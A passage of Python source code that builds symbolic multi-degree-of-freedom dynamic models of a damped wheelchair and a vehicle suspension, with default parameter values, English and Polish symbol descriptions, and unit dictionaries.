self.c_rt=c_rt\n if c_ft is not None: self.c_ft=c_ft\n if c is not None: self.c=c\n if F is not None: self.F=F\n if A is not None: self.A=A\n if R is not None: self.R=R\n if f is not None: self.f=f\n if g is not None: self.g=g\n if Omega is not None: self.Omega=Omega\n if omega is not None: self.omega=omega\n if I_ch is not None: self.I_ch = I_ch # moment of inertia of a rod\n if I_w is not None: self.I_w = I_w\n if F_engine is not None: self.F_engine = F_engine\n if l_bumps is not None: self.l_bumps = l_bumps\n if amplitude is not None: self.amplitude = amplitude\n if length is not None: self.length = length\n if speed is not None: self.speed = speed\n if Leng is not None: self.Leng = Leng\n if k is not None: self.k=k\n if k_rot is not None: self.k_rot=k_rot\n if F_1 is not None: self.F_1=F_1\n if F_2 is not None: self.F_2=F_2\n if v0 is not None: self.v0=v0\n if u0 is not None: self.u0=u0\n if z_c3 is not None: self.z_c3=z_c3\n if xm_3 is not None: self.xm_3=xm_3\n if t_l is not None: self.t_l=t_l\n if delta_t is not None: self.delta_t=delta_t\n if l_ramp is not None: self.l_ramp=l_ramp\n if axw is not None: self.axw=axw\n if pm is not None: self.pm=pm\n# if xt is not None: self.xt=xt\n self.s=self.A*sin(ivar*self.omega)\n self.qs=[self.z_fr,self.z_rear,self.x,self.z,self.phi]\n \n \n self.right_wheel = MaterialPoint(self.m_fr, pos1=self.z_fr, qs=[self.z_fr])\n self.left_wheel = MaterialPoint(self.m_rear, pos1=self.z_rear, qs=[self.z_rear])\n self.spring_pw = Spring(self.k_ft, pos1=self.z_fr, pos2=self.s, qs=[self.z_fr])\n self.spring_lw = Spring(self.k_rt, pos1=self.z_rear, pos2=self.s, qs=[self.z_rear])\n self.damper_pw = Damper(self.c_ft, pos1=self.z_fr, pos2=self.s, qs=[self.z_fr])\n self.damper_lw = Damper(self.c_rt, pos1=self.z_rear, pos2=self.s, qs=[self.z_rear])\n \n \n \n# self.body = RigidBody2D(self.m, self.I, pos_lin=self.z+self.x, pos_rot=self.phi, qs=[self.z, self.phi,self.x]) # rod\n self.body_hor= MaterialPoint(self.M, pos1=self.x, qs=[self.x])\n self.body_ver= MaterialPoint(self.M, pos1=self.z, qs=[self.z])\n self.body_rot= MaterialPoint(self.I_ch, pos1=self.phi, qs=[self.phi])\n self.front_wheel_hor=MaterialPoint(self.m_fr,pos1=self.x,qs=[self.x])\n self.rear_wheel_hor=MaterialPoint(self.m_rear,pos1=self.x,qs=[self.x])\n self.front_wheel_rot=MaterialPoint(self.I_w,pos1=self.x/self.R,qs=[self.x])\n# self.pasazer= MaterialPoint(self.m_k, pos1=self.z+self.phi*self.l_k, qs=[self.z, self.phi])\n self.spring_1 = Spring(self.k_r, pos1=self.z+self.phi*self.l_l , pos2 = self.z_rear , qs=[self.z, self.phi, self.z_rear]) # left spring\n self.spring_2 = Spring(self.k_f, pos1=self.z-self.phi*self.l_r , pos2 = self.z_fr , qs=[self.z, self.phi, self.z_fr])\n self.damper_1= Damper(self.c_rs, pos1=self.z+self.phi*self.l_l , pos2 = self.z_rear , qs=[self.z, self.phi, self.z_rear])\n self.damper_2 = Damper(self.c_fs, pos1=self.z-self.phi*self.l_r , pos2 = self.z_fr , qs=[self.z, self.phi, self.z_fr])\n self.damper_x=Damper(self.c,pos1=self.x,qs=[self.x])\n self.damper_z=Damper(self.c,pos1=self.z,qs=[self.z])\n self.damper_phi=Damper(self.c,pos1=self.phi,qs=[self.phi])\n self.force_1 = Force(self.F*(sign(cos(self.Omega*self.ivar)-self.pm)+1), pos1=self.x , qs=[self.x])\n self.gravitational_force = GravitationalForce(self.M, self.g, (self.z+self.z_c3)*cos(self.phi), qs = self.qs)\n# self.force_2 = Force(self.A*sin(ivar*self.omega), pos1=self.z_pw, qs=[self.z_pw])\n \n #self.force = Force(-self.F_engine, pos1=self.z - self.l_p * self.phi, qs=[self.z, self.phi])\n system = self.body_hor + self.body_ver + self.body_rot +self.spring_1 + self.spring_2 +self.damper_1+self.damper_2 + self.right_wheel + self.left_wheel + self.spring_pw+ self.spring_lw+self.damper_lw+self.damper_pw+self.damper_x +self.force_1+self.front_wheel_hor+self.front_wheel_rot + self.rear_wheel_hor + self.gravitational_force + self.damper_z + self.damper_phi\n\n super().__init__(**{'system':system,**kwargs})\n \n def get_param_values(self):\n default_data_dict={self.F:150,\n \n# c_mu:0.0001,\n# c_lam:0.0001,\n self.l_l:0.2,\n self.l_r:0.4,\n \n self.k_f:750000,\n self.k_ft:300000,\n self.k_r:750000,\n self.k_rt:109000,\n self.M:75,\n self.I_ch:9.479342+self.M*0.39*0.39,\n self.m_rear:1.5,\n self.m_fr:0.6,\n self.pm:0.1,\n self.Omega:0.3*np.pi*2,\n self.R:0.3,\n\n self.g:9.81,\n self.I_w:self.m_rear*self.R**2,\n self.l_fr:0.2,\n self.l_rear:0.01,\n self.u0:0.005,\n self.z_c3:0.01,\n self.l_bumps:0.15,\n self.amplitude:0.0165,\n self.length:0.19,\n self.speed:1.7,\n self.axw:0.47,\n self.c_ft:107,\n self.c_rt:5500,\n self.c_fs:107,\n self.c_rs:107,\n self.c:100,\n self.A:0.001*10,\n self.omega:4*np.pi,\n }\n \n return default_data_dict \n def get_table_values(self):\n default_data_dict={\n \n self.c:100,\n self.c_rt:5500,\n self.m_rear:1.5,\n self.M:75,\n self.k_ft:300000,\n self.k_r:750000,\n }\n \n return default_data_dict \n def symbols_description(self):\n self.sym_desc_dict = {\n self.m_fr:'front wheel mass',\n self.m_rear:'rear wheel mass',\n self.M:'''mass of the main body including user''',\n self.k_r:'rear wheel stiffness',\n self.k_rt:'rear wheel tire stiffness',\n self.k_f:'front wheel stiffness',\n self.k_ft:'front wheel tire stiffness',\n self.k_rot:'rotational stiffness',\n self.m:'wheelchair mass',\n self.k:'wheelchair stiffness',\n self.g:'gravitational acceleration',\n self.F_1:'initial force',\n self.F_2:'initial force',\n self.Omega:'driving force frequency',\n self.F:'disabled driver arm force',\n self.R:'rear wheel radius',\n self.v0:'wheelchair initial velocity ',\n self.u0:'road profil amplitude',\n self.I_ch:'''wheelchair's moment of inertia''',\n self.I_w:'''rear wheel moment of inertia''',\n self.z_c3:'''vertical distance between wheelchair's center of mass and constant reference height''',\n self.l_fr:'front wheelchair spring initial length',\n self.l_rear:'rear wheelchair spring initial length',\n# self.m_RC:'RapidChair drive rocker arm mass',\n# self.I_RC:'RapidChair drive moment of inertia',\n# self.l_RC:'Rapidchair drive rocker arm length',\n# self.k_RC:'RapidChair drive stiffness',\n# self.phi0:'initial rocker arm axis angle relative to horizontal plane',\n# self.m_w:'RapidChair drive wheel mass',\n# self.I_wrc:'RapidChair drive wheel moment of inertia',\n# self.r_w:'RapidChair drive wheel radius', #do sprawdzenia, nie jestem pewien\n# self.k_w:'RapidChair drive wheel striffness',\n# self.k_fix:'fastening stiffness',\n# self.k_tire:'RapidChair drive wheel tire striffness',\n self.c:'general resistance to motion coefficient',\n self.c_fs:'vertical damping coefficient of front suspension',\n self.c_rs:'vertical damping coefficient of rear suspension',\n self.c_ft:'vertical damping coefficient of caster band',\n self.c_rt:'vertical damping coefficient of rear tire',\n# self.c_mu:'inertia damping decrement',\n# self.c_lam:'stiffness damping decrement',\n self.xm_3:'center of mass location in x axis',\n self.l_l: r'offset of left spring',\n self.l_r: r'offset of right spring',\n# self.a_ox:'acceleration in x axis - longitudal axis', # acc osi\n# self.a_oz:'acceleration in z axis - vertical axis',\n# self.a_rz:'acceleration of wishbone',\n# self.a_rcz:'????',\n self.t_l:'phase shift of the wheels',\n self.delta_t:'the moment of occurrence of the obstacle',\n self.l_ramp:'ramp length',\n self.l_bumps:'bumps length',\n self.amplitude:'????',\n self.length:'????',\n self.speed:'steady state velocity',\n self.axw:'wheelbase',\n self.pm:'force duty cycle',\n self.A:'ground forcing amplitude',\n self.Leng:'????',\n \n \n self.x:'main body center of mass horizontal displacement',\n self.z_fr:'front wheel vertical displacement',\n self.z_rear:'rear wheel vertical displacement',\n self.z:'main body center of mass vertical displacement',\n# self.z_wrc:'vertical displacement of the RapidChair driven wheel',\n self.phi:'angular displacement of the main mass',\n# self.phi_rc:'angular displacement of the RapidChair drive',\n# self.theta:'angular displacement of the RapidChair driven wheel',\n \n self.x.diff(t):'main body center of mass horizontal velocity',\n self.z_fr.diff(t):'front wheel vertical velocity',\n self.z_rear.diff(t):'rear wheel vertical velocity',\n self.z.diff(t):'main body center of mass vertical velocity',\n# self.z_wrc.diff(t):'vertical velocity of the RapidChair driven wheel',\n self.phi.diff(t):'angular velocity of the main mass',\n# self.phi_rc.diff(t):'angular velocity of the RapidChair drive',\n# self.theta.diff(t):'angular velocity of the RapidChair driven wheel',\n \n\n \n self.x.diff(t,t):'main body center of mass horizontal acceleration',\n self.z_fr.diff(t,t):'front wheel vertical acceleration',\n self.z_rear.diff(t,t):'rear wheel vertical acceleration',\n self.z.diff(t,t):'main body center of mass vertical acceleration',\n# self.z_wrc.diff(t,t):'vertical acceleration of the RapidChair driven wheel',\n self.phi.diff(t,t):'angular acceleration of the main mass',\n# self.phi_rc.diff(t,t):'angular acceleration of the RapidChair drivetrain',\n# self.theta.diff(t,t):'angular acceleration of the RapidChair driven wheel',\n# self.T:'overall kinetic energy',\n# self.V:'overall potential energy',\n Symbol('L',positive=True):'''Lagrange's function''',\n Symbol('v',positive=True):'''steady state velocity''',\n self.ivar:'time',\n self.T:'total kinetic energy',\n self.V:'total potential energy',\n self.D:'total dissipative potential',\n self.omega:'frequency of road profile'\n }\n return self.sym_desc_dict\n# def symbols_description(self):\n# self.sym_desc_dict = {\n# self.m: r'Masa resorowana',\n# self.m_p: r'Masa przedniej osi',\n# self.m_l: r'Masa tylnej osi',\n# self.m_b: r'Masa baterii trakcyjnej',\n# self.m_b: r'Masa pasazera',\n# self.I: r'Moment bezwładności',\n# self.l_rod: r'Długość osi',\n# self.l_p: r'Odległość przedniej osi do środka ciężkości autobusu',\n# self.l_l: r'Odległość tylnej osi do środka ciężkości autobusu',\n# self.l_b: r'Odległość środka cieżkości baterii do środka ciężkości autobusu',\n# self.k_p: r'Współczynnik sztywności dla sprężyny przedniej nadwozia',\n# self.k_l: r'Współczynnik sztywności dla sprężyny tylnej nadwozia',\n# self.k_pw: r'Współczynnik sztywności dla przedniej opony',\n# self.k_lw: r'Współczynnik sztywności dla tylnej opony',\n# self.c_l: r'Współczynnik tłumienia dla amortzatora przedniego n',\n# self.c_l: r'Współczynnik tłumienia dla amortzatora tylnego',\n# self.c_lw: r'Współczynnik tłumienia dla tylnej opony',\n# self.c_pw: r'Współczynnik tłumienia dla przedniej opony',\n# self.phi: r'Kąt obrotu masy resorowanej',\n# self.z: r'Przemieszczenie pionowe środka cieżkości masy resorowanej',\n# self.z_pw: r'Przemieszczenie pionowe przedniego koła',\n# self.z_lw: r'Przemieszczenie pionowe tylnego koła',\n# self.z_b: r'Przemieszczenie pionowe baterii',\n# self.A: r'Amplituda siły wymuszającej',\n# self.omega: r'Częstość siły wymuszającej',\n# self.ivar: r'Czas',\n# self.f: r'Częstotliwość wymuszenia',\n \n \n# }\n# return self.sym_desc_dict\n \nsys4=DampedChair4DOF()\ny=[sys4.q,sys4.z, sys4.z.diff(t,t)]\nic_list = [0.1,0.1,0,0,0.1,0.1,0,0]\nunits_dict = {\n sys4.F:ureg.kilogram*ureg.meter/ureg.second**2,\n #dyn_sys.c_mu:0.0001,\n #dyn_sys.c_lam:0.0001,\n sys4.l_l:ureg.meter,\n sys4.l_r:ureg.meter,\n sys4.k_f:ureg.newton/ureg.meter,\n sys4.k_ft:ureg.kilogram/ureg.second**2,\n sys4.k_r:ureg.newton/ureg.meter,\n sys4.k_rt:ureg.kilogram/ureg.second**2,\n sys4.c:ureg.newton*ureg.second/ureg.meter,\n sys4.c_fs:ureg.newton*ureg.second/ureg.meter,\n sys4.c_rs:ureg.newton*ureg.second/ureg.meter,\n sys4.c_ft:ureg.newton*ureg.second/ureg.meter,\n sys4.c_rt:ureg.newton*ureg.second/ureg.meter,\n sys4.I_ch:ureg.meter**2*ureg.kilogram,\n sys4.M:ureg.kilogram,\n sys4.m_rear:ureg.kilogram,\n sys4.m_fr:ureg.kilogram,\n sys4.Omega:ureg.radian/ureg.second,\n sys4.R:ureg.meter,\n #dyn_sys.z_c3:0.4,\n sys4.g:ureg.meter/ureg.second**2,\n sys4.I_w:ureg.meter**2*ureg.kilogram,\n sys4.l_fr:ureg.meter,\n sys4.l_rear:ureg.meter,\n #dyn_sys.u0:,\n sys4.l_bumps:ureg.meter,\n sys4.amplitude:ureg.meter,\n sys4.length:ureg.meter,\n sys4.speed:ureg.meter/ureg.second,\n #self.axw:0.47,\n sys4.Leng:ureg.meter,\n sys4.m:ureg.kilogram,\n sys4.k:(ureg.newton / ureg.meter),\n t:ureg.second,\n f:ureg.hertz,\n sys4.z:ureg.meter,\n sys4.phi: ureg.radian,\n sys4.z.diff(t,2):ureg.meter/ureg.second**2,\n sys4.phi.diff(t,2): ureg.radian/ureg.second**2,\n sys4.pm:ureg.meter/ureg.meter,\n sys4.u0:ureg.meter,\n }\n\n# units_dict = {sys4.m:ureg.kilogram,\n# sys4.m_p:ureg.kilogram,\n# sys4.m_l:ureg.kilogram,\n# sys4.m_b:ureg.kilogram,\n# sys4.m_k:ureg.kilogram,\n# sys4.A:ureg.meter,\n# sys4.k_l:(ureg.newton / ureg.meter),\n# sys4.k_lw:(ureg.newton / ureg.meter),\n# sys4.k_p:(ureg.newton / ureg.meter),\n# sys4.k_pw:(ureg.newton / ureg.meter),\n# sys4.c_l:(ureg.newton*ureg.second / ureg.meter),\n# sys4.c_lw:(ureg.newton*ureg.second / ureg.meter),\n# sys4.c_p:(ureg.newton*ureg.second / ureg.meter),\n# sys4.c_pw:(ureg.newton*ureg.second / ureg.meter),\n# sys4.omega:ureg.radian,\n# sys4.l_l:ureg.meter,\n# sys4.l_p:ureg.meter,\n# sys4.l_b:ureg.meter,\n# sys4.l_rod:ureg.meter,\n# sys4.I:(ureg.kilogram*ureg.meter*ureg.meter),\n# sys4.phi:ureg.radian,\n# sys4.z:ureg.meter,\n# sys4.z.diff(t,t):ureg.meter/ureg.second**2,\n# sys4.z_lw:ureg.meter,\n# sys4.z_pw:ureg.meter,\n# sys4.z_b:ureg.meter,\n# t:ureg.second,\n# f:ureg.hertz,\n \n# }\n\nunit=units_dict\n \nclass DampedChairDDOF(ComposedSystem):\n\n \n \n z,phi,z_pw,z_lw=dynamicsymbols('z, \\\\varphi z_pw z_lw')\n m=Symbol('m', positive=True)\n m_b=Symbol('m_b', positive=True)\n m_p=Symbol('m_p', positive=True)\n m_l=Symbol('m_l', positive=True)\n I=Symbol('I', positive=True)\n l_rod=Symbol('l_{rod}', positive=True)\n l_l=Symbol('l_l', positive=True)\n l_p=Symbol('l_p', positive=True)\n l_b=Symbol('l_b', positive=True)\n k_l=Symbol('k_l1', positive=True)\n k_lw=Symbol('k_lw', positive=True)\n k_p=Symbol('k_p1', positive=True)\n k_pw=Symbol('k_pw', positive=True)\n c_l=Symbol('c_l', positive=True)\n c_p=Symbol('c_p', positive=True)\n c_lw=Symbol('c_lw', positive=True)\n c_pw=Symbol('c_pw', positive=True)\n F_engine=Symbol('F_{engine}', positive=True)\n k_p=Symbol('k_p', positive=True)\n k_l=Symbol('k_l', positive=True)\n A=Symbol('A', positive=True)\n omega=Symbol('omega', positive=True)\n z_l=Symbol('z_l', positive=True)\n z_p=Symbol('z_p',positive=True)\n z_b=Symbol('z_b',positive=True)\n s=Symbol('s', positive=True)\n ivar=Symbol('t')\n \n def __init__(self,\n m=None,\n m_p=None,\n m_l=None,\n m_b=None,\n I=None,\n l_rod=None,\n l_l=None,\n l_p=None,\n l_b=None,\n k_l=None,\n k_lw=None,\n k_p=None,\n k_pw=None,\n c_l=None,\n c_p=None,\n c_lw=None,\n c_pw=None,\n F_engine=None,\n ivar=Symbol('t'),\n z=None,\n s=None,\n phi=None,\n z_pw=None,\n z_lw=None,\n A=None,\n omega=None,\n z_l=None,\n z_p=None,\n z_b=None,\n **kwargs):\n \n if z is not None: self.z=z\n if phi is not None: self.phi=phi\n \n\n if m is not None: self.m = m # mass of a rod\n if m_p is not None: self.m_w = m_w\n if m_l is not None: self.m_w = m_w\n if m_b is not None: self.m_b = m_b\n if l_l is not None: self.l_l = l_l # offset of left spring\n if l_p is not None: self.l_p = l_p #offset of right spring\n if l_b is not None: self.l_p = l_b \n if l_rod is not None: self.l_rod = l_rod\n if k_l is not None: self.k_l1 = k_l1\n if k_lw is not None: self.k_lw = k_lw\n if k_p is not None: self.k_p1 = k_p1\n if k_pw is not None: self.k_pw = k_pw\n if c_l is not None: self.c_l=c_l\n if c_p is not None: self.c_p=c_p\n if c_lw is not None: self.c_lw=c_lw\n if c_pw is not None: self.c_pw=c_pw\n if A is not None: self.A=A\n if omega is not None: self.omega=omega\n if I is not None: self.I = I # moment of inertia of a rod\n if F_engine is not None: self.F_engine = F_engine\n \n self.s=self.A*sin(ivar*self.omega)\n \n self.z_l=self.z+self.phi*self.l_l\n self.z_p=self.z-self.phi*self.l_p\n self.z_lw=(self.k_l*self.z_l)/(self.k_lw+self.k_l)\n self.z_pw=(self.k_p*self.z_p)/(self.k_pw+self.k_p)\n \n \n self.right_wheel = MaterialPoint(self.m_p, pos1=self.z_pw, qs=[self.z, self.phi])\n self.left_wheel = MaterialPoint(self.m_l, pos1=self.z_lw, qs=[self.z, self.phi])\n self.spring_pw = Spring(self.k_pw, pos1=self.z_pw, pos2=self.s, qs=[self.z, self.phi])\n self.spring_lw = Spring(self.k_lw, pos1=self.z_lw, pos2=self.s, qs=[self.z, self.phi])\n self.damper_pw = Damper(self.c_pw, pos1=self.z_pw, pos2=self.s, qs=[self.z, self.phi])\n self.damper_lw = Damper(self.c_lw, pos1=self.z_lw, pos2=self.s, qs=[self.z, self.phi])\n #self.spring=Spring(k,pos1,po2,qs)\n \n self.body = RigidBody2D(self.m, self.I, pos_lin=self.z, pos_rot=self.phi, qs=[self.z, self.phi]) # rod\n self.battery= MaterialPoint(self.m_b, pos1=self.z+self.phi*self.l_b, qs=[self.z, self.phi])\n self.spring_1 = Spring(self.k_l, pos1=self.z_l , pos2 = self.z_lw , qs=[self.z, self.phi]) # left spring\n self.spring_2 = Spring(self.k_p, pos1=self.z_p, pos2=self.z_pw, qs=[self.z, self.phi])\n self.damper_1=Damper(self.c_l, pos1=self.z_p , pos2 = self.z_lw , qs=[self.z, self.phi])\n self.damper_2 = Damper(self.c_p, pos1=self.z_l , pos2 = self.z_pw , qs=[self.z, self.phi])\n\n #self.force = Force(-self.F_engine, pos1=self.z - self.l_p * self.phi, qs=[self.z, self.phi])\n system = self.body +self.battery+ self.spring_1 + self.spring_2 + self.damper_1+ self.damper_2 + self.right_wheel + self.left_wheel + self.spring_pw + self.spring_lw+self.damper_lw+self.damper_pw\n \n# display(type(system))\n \n# system_new = system.subs({self.z_lw:self.z_l2,self.z_pw:self.z_p2}) \n \n# display(type(system_new))\n# display(type(self.body))\n \n #super().__init__(system_new,**kwargs)\n\n super().__init__(**{'system':system,**kwargs})\n \n\n\n \n def symbols_description(self):\n self.sym_desc_dict = {\n self.m: r'Masa resorowana',\n self.m_p: r'Masa przedniej osi',\n self.m_l: r'Masa tylnej osi',\n self.m_b: r'Masa baterii trakcyjnej',\n self.I: r'Moment bezwładności',\n self.l_rod: r'Długość osi',\n self.l_p: r'Odległość od przedniej osi do środka ciężkości autobusu',\n self.l_l: r'Odległość od tylnej osi do środka ciężkości autobusu',\n self.l_b: r'Odległość od środka cieżkości baterii do środka ciężkości autobusu',\n self.k_p: r'Współczynnik sztywności dla sprężyny przedniej nadwozia',\n self.k_l: r'Współczynnik sztywności dla sprężyny tylnej nadwozia',\n self.k_pw: r'Współczynnik sztywności dla przedniej opony',\n self.k_lw: r'Współczynnik sztywności dla tylnej opony',\n self.c_l: r'Współczynnik tłumienia dla amortzatora przedniego n',\n self.c_l: r'Współczynnik tłumienia dla amortzatora tylnego',\n self.c_lw: r'Współczynnik tłumienia dla tylnej opony',\n self.c_pw: r'Współczynnik tłumienia dla przedniej opony',\n self.phi: r'Kąt obrotu masy resorowanej',\n self.z: r'Przemieszczenie pionowe środka cieżkości masy resorowanej',\n self.z_pw: r'Przemieszczenie pionowe przedniego koła',\n self.z_lw: r'Przemieszczenie pionowe tylnego koła',\n self.z_b: r'Przemieszczenie pionowe baterii',\n self.A: r'Amplituda siły wymuszającej',\n self.omega: r'Częstość siły wymuszającej',\n self.ivar: r'Czas',\n \n }\n return self.sym_desc_dict\n \nsys2=DampedChairDDOF()\n\n\n\nunits_dict1 = {sys2.m:ureg.kilogram,\n sys2.m_p:ureg.kilogram,\n sys2.m_l:ureg.kilogram,\n sys2.m_b:ureg.kilogram,\n sys2.A:ureg.meter,\n sys2.k_l:(ureg.newton / ureg.meter),\n sys2.k_lw:(ureg.newton / ureg.meter),\n sys2.k_p:(ureg.newton / ureg.meter),\n sys2.k_pw:(ureg.newton / ureg.meter),\n sys2.c_l:(ureg.newton*ureg.second / ureg.meter),\n sys2.c_lw:(ureg.newton*ureg.second / ureg.meter),\n sys2.c_p:(ureg.newton*ureg.second / ureg.meter),\n sys2.c_pw:(ureg.newton*ureg.second / ureg.meter),\n sys2.omega:ureg.radian,\n sys2.l_l:ureg.meter,\n sys2.l_p:ureg.meter,\n sys2.l_b:ureg.meter,\n sys2.l_rod:ureg.meter,\n sys2.I:(ureg.kilogram*ureg.meter*ureg.meter),\n sys2.phi:ureg.radian,\n sys2.z:ureg.meter,\n sys2.z.diff(t,t):ureg.meter/ureg.second**2,\n sys2.z_lw:ureg.meter,\n sys2.z_pw:ureg.meter,\n sys2.z_b:ureg.meter,\n t:ureg.second,\n f:ureg.hertz,\n }\n\nunit1=units_dict1\n \nclass DampedChairSimplifiedDDOF2(ComposedSystem):\n\n \n \n z,phi,z_pw,z_lw=dynamicsymbols('z, \\\\varphi z_pw z_lw')\n m=Symbol('m', positive=True)\n m_b=Symbol('m_b', positive=True)\n m_p=Symbol('m_p', positive=True)\n m_l=Symbol('m_l', positive=True)\n I=Symbol('I', positive=True)\n l_rod=Symbol('l_{rod}', positive=True)\n l_l=Symbol('l_l', positive=True)\n l_p=Symbol('l_p', positive=True)\n l_b=Symbol('l_b', positive=True)\n k_l=Symbol('k_l1', positive=True)\n k_lw=Symbol('k_lw', positive=True)\n k_p=Symbol('k_p1', positive=True)\n k_pw=Symbol('k_pw', positive=True)\n c_l=Symbol('c_l', positive=True)\n c_p=Symbol('c_p', positive=True)\n c_lw=Symbol('c_lw', positive=True)\n c_pw=Symbol('c_pw', positive=True)\n F_engine=Symbol('F_{engine}', positive=True)\n k_p=Symbol('k_p', positive=True)\n k_l=Symbol('k_l', positive=True)\n A=Symbol('A', positive=True)\n omega=Symbol('omega', positive=True)\n z_l=Symbol('z_l', positive=True)\n z_p=Symbol('z_p',positive=True)\n z_b=Symbol('z_b',positive=True)\n s=Symbol('s', positive=True)\n k_l_zas=Symbol('k_l_zas', positive=True)\n k_p_zas=Symbol('k_p_zas', positive=True)\n c_l_zas=Symbol('c_l_zas', positive=True)\n c_p_zas=Symbol('c_lp_zas', positive=True)\n ivar=Symbol('t')\n \n def __init__(self,\n m=None,\n m_p=None,\n m_l=None,\n m_b=None,\n I=None,\n l_rod=None,\n l_l=None,\n l_p=None,\n l_b=None,\n k_l=None,\n k_lw=None,\n k_p=None,\n k_pw=None,\n c_l=None,\n c_p=None,\n c_lw=None,\n c_pw=None,\n F_engine=None,\n ivar=Symbol('t'),\n z=None,\n phi=None,\n z_pw=None,\n z_lw=None,\n A=None,\n omega=None,\n z_l=None,\n z_p=None,\n z_b=None,\n s=None,\n k_l_zas=None,\n k_p_zas=None,\n c_l_zas=None,\n c_p_zas=None,\n \n **kwargs):\n if z is not None: self.z=z\n if z_lw is not None: self.z_lw=z_lw\n if z_pw is not None: self.z_pw=z_pw\n if z_l is not None: self.z_lw=z_lw\n if z_p is not None: self.z_pw=z_pw\n if z_b is not None: self.z_b=z_b\n if phi is not None: self.phi=phi\n\n if m is not None: self.m = m # mass of a rod\n if m_p is not None: self.m_w = m_w\n if m_l is not None: self.m_w = m_w\n if m_b is not None: self.m_b = m_b\n if l_l is not None: self.l_l = l_l # offset of left spring\n if l_p is not None: self.l_p = l_p #offset of right spring\n if l_b is not None: self.l_p = l_b \n if l_rod is not None: self.l_rod = l_rod\n if k_l is not None: self.k_l1 = k_l1\n if k_lw is not None: self.k_lw = k_lw\n if k_p is not None: self.k_p1 = k_p1\n if k_pw is not None: self.k_pw = k_pw\n if c_l is not None: self.c_l=c_l\n if c_p is not None: self.c_p=c_p\n if c_lw is not None: self.c_lw=c_lw\n if c_pw is not None: self.c_pw=c_pw\n if A is not None: self.A=A\n if omega is not None: self.omega=omega\n if I is not None: self.I = I # moment of inertia of a rod\n if F_engine is not None: self.F_engine = F_engine\n \n \n self.s=self.A*sin(ivar*self.omega)\n \n self.k_l_zas=(self.k_l*self.k_lw)/(self.k_l+self.k_lw)\n self.k_p_zas=(self.k_p*self.k_pw)/(self.k_p+self.k_pw)\n self.c_l_zas=(self.c_l*self.c_lw)/(self.c_l+self.c_lw)\n self.c_p_zas=(self.c_p*self.c_pw)/(self.c_p+self.c_pw)\n \n self.z_l=self.z+self.phi*self.l_l\n self.z_p=self.z-self.phi*self.l_p\n self.z_lw=(self.k_l*self.z_l)/(self.k_lw+self.k_l)\n self.z_pw=(self.k_p*self.z_p)/(self.k_pw+self.k_p)\n \n #self.right_wheel = MaterialPoint(self.m_w, pos1=self.z_pw, qs=[self.z, self.phi])\n #self.left_wheel = MaterialPoint(self.m_w, pos1=self.z_lw, qs=[self.z, self.phi])\n #self.spring_pw = Spring(self.k_pw, pos1=self.z_pw, pos2=self.s, qs=[self.z, self.phi])\n #self.spring_lw = Spring(self.k_lw, pos1=self.z_lw, pos2=self.s, qs=[self.z, self.phi])\n #self.spring=Spring(k,pos1,po2,qs)\n \n self.body = RigidBody2D(self.m, self.I, pos_lin=self.z, pos_rot=self.phi, qs=[self.z, self.phi]) # rod\n self.battery= MaterialPoint(self.m_b, pos1=self.z+self.phi*self.l_b, qs=[self.z, self.phi])\n self.spring_1 = Spring(self.k_l_zas, pos1=self.z_l , pos2 = self.s , qs=[self.z, self.phi]) # left spring\n self.spring_2 = Spring(self.k_p_zas, pos1=self.z_p, pos2=self.s, qs=[self.z, self.phi])\n self.damper_1=Damper(self.c_l_zas, pos1=self.z_p , pos2 = self.s, qs=[self.z, self.phi])\n self.damper_2 = Damper(self.c_p_zas, pos1=self.z_l , pos2 = self.s , qs=[self.z, self.phi])\n\n #self.force = Force(-self.F_engine, pos1=self.z - self.l_p * self.phi, qs=[self.z, self.phi])\n system = self.body +self.battery+ self.spring_1 + self.spring_2 + self.damper_1+ self.damper_2 \n \n# display(type(system))\n \n# system_new = system.subs({self.z_lw:self.z_l2,self.z_pw:self.z_p2}) \n \n# display(type(system_new))\n# display(type(self.body))\n \n #super().__init__(system_new,**kwargs)\n\n super().__init__(**{'system':system,**kwargs}) \n\n def symbols_description(self):\n self.sym_desc_dict = {\n self.m: r'Masa resorowana',\n self.m_p: r'Masa przedniej osi',\n self.m_l: r'Masa tylnej osi',\n self.m_b: r'Masa baterii trakcyjnej',\n self.I: r'Moment bezwładności',\n self.l_rod: r'Długość osi',\n self.l_p: r'Odległość od przedniej osi do środka ciężkości autobusu',\n self.l_l: r'Odległość od tylnej osi do środka ciężkości autobusu',\n self.l_b: r'Odległość od środka cieżkości baterii do środka ciężkości autobusu',\n self.k_p: r'Współczynnik sztywności dla sprężyny przedniej nadwozia',\n self.k_l: r'Współczynnik sztywności dla sprężyny tylnej nadwozia',\n self.k_pw: r'Współczynnik sztywności dla przedniej opony',\n self.k_lw: r'Współczynnik sztywności dla tylnej opony',\n self.c_l: r'Współczynnik tłumienia dla amortzatora przedniego n',\n self.c_l: r'Współczynnik tłumienia dla amortzatora tylnego',\n self.c_lw: r'Współczynnik tłumienia dla tylnej opony',\n self.c_pw: r'Współczynnik tłumienia dla przedniej opony',\n self.phi: r'Kąt obrotu masy resorowanej',\n self.z: r'Przemieszczenie pionowe środka cieżkości masy resorowanej',\n self.z_pw: r'Przemieszczenie pionowe przedniego koła',\n self.z_lw: r'Przemieszczenie pionowe tylnego koła',\n self.z_b: r'Przemieszczenie pionowe baterii',\n self.A: r'Amplituda siły wymuszającej',\n self.omega: r'Częstość siły wymuszającej',\n self.ivar: r'Czas',\n self.k_l_zas: r'Zastępcza wartość współczynnika sztywności zawieszenia tylnej osi',\n self.k_p_zas: r'Zastępcza wartość współczynnika sztywności zawieszenia przedniej osi',\n self.c_l_zas: r'Zastępcza wartość współczynnika tłumienia zawieszenia tylnej osi',\n self.c_p_zas: r'Zastępcza wartość współczynnika tłumienia zawieszenia przedniej osi',\n }\n return self.sym_desc_dict\n \nsys22=DampedChairSimplifiedDDOF2() \n \nunits_dict2 = {sys22.m:ureg.kilogram,\n sys22.m_p:ureg.kilogram,\n sys22.m_l:ureg.kilogram,\n sys22.m_b:ureg.kilogram,\n sys22.A:ureg.meter,\n sys22.k_l:(ureg.newton / ureg.meter),\n sys22.k_lw:(ureg.newton / ureg.meter),\n sys22.k_p:(ureg.newton / ureg.meter),\n sys22.k_pw:(ureg.newton / ureg.meter),\n sys22.c_l:(ureg.newton*ureg.second / ureg.meter),\n sys22.c_lw:(ureg.newton*ureg.second / ureg.meter),\n sys22.c_p:(ureg.newton*ureg.second / ureg.meter),\n sys22.c_pw:(ureg.newton*ureg.second / ureg.meter),\n sys22.omega:ureg.radian,\n sys22.l_l:ureg.meter,\n sys22.l_p:ureg.meter,\n sys22.l_b:ureg.meter,\n sys22.l_rod:ureg.meter,\n 